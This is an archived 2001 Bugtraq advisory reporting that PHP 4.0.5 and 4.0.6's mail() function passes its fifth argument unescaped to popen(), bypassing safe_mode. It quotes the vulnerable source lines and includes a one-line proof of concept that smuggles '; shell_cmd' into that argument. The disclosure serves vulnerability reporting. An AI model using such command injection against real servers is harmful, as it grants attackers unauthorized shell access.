[21607] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

php mail function bypass safe_mode restriction

daemon@ATHENA.MIT.EDU (Laurent Sintes)
Wed Jul 18 12:19:32 2001

Date: Wed, 18 Jul 2001 02:53:57 +0200
From: Laurent Sintes <sintes@nfrance.com>
To: bugtraq@securityfocus.com
Message-ID: <20010718025357.A19592@albertine.nfrance.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

php mail() function does not do check for escape shell commandes,
even if php is running in safe_mode.

So it's may be possible to bypass the safe_mode restriction and gain
shell access.

Affected:
php4.0.6
php4.0.5

Significatives lines of ext/standard/mail.c:

>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");

Exploit:
mail("toto@toto.com",
         "test",
         "test",
         "test",
        "; shell_cmd");


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[21607] in bugtraq

php mail function bypass safe_mode restriction

daemon@ATHENA.MIT.EDU (Laurent Sintes)Wed Jul 18 12:19:32 2001

daemon@ATHENA.MIT.EDU (Laurent Sintes)
Wed Jul 18 12:19:32 2001